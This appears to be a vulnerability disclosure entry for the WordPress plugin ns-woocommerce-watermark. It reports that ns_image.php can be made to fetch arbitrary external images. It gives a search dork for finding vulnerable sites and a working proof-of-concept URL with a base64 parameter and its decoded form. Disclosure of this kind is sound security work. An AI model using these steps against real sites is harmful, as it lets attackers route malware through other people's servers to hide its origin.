An unprivileged user could use the functionality of the plugin to load images that hide malware for example from passing malicious domains to hide their trace, by making them pass through the vulnerable domain.
Search for a vulnerable domain with the dork: "/wp-content/plugins/ns-woocommerce-watermark" Then go to the path and add: //ns_image.php?param=aW1hZ2VfcGF0aD1odHRwczovL2MudGVub3IuY29tL0VtaVhDd0RKT3JJQUFBQWQvbG9sLXRyb2xvbG8uZ2lmJnd0X3BhdGg9aHR0cHM6Ly9jLnRlbm9yLmNvbS9FbWlYQ3dESk9ySUFBQUFkL2xvbC10cm9sb2xvLmdpZiZvdGhlcj0= The param value can be modified by decoding it in base64: image_path=https://c.tenor.com/EmiXCwDJOrIAAAAd/lol-trololo.gif&wt_path=https://c.tenor.com/EmiXCwDJOrIAAAAd/lol-trololo.gif&other= https://example.com/wp-content/plugins/ns-woocommerce-watermark/ns_image.php?param=aW1hZ2VfcGF0aD1odHRwczovL2MudGVub3IuY29tL0VtaVhDd0RKT3JJQUFBQWQvbG9sLXRyb2xvbG8uZ2lmJnd0X3BhdGg9aHR0cHM6Ly9jLnRlbm9yLmNvbS9FbWlYQ3dESk9ySUFBQUFkL2xvbC10cm9sb2xvLmdpZiZvdGhlcj0=
Felipe Restrepo Rodríguez
Felipe Restrepo Rodríguez
Yes
2022-03-15 (about 10 months ago)
2022-03-15 (about 10 months ago)
2022-04-09 (about 9 months ago)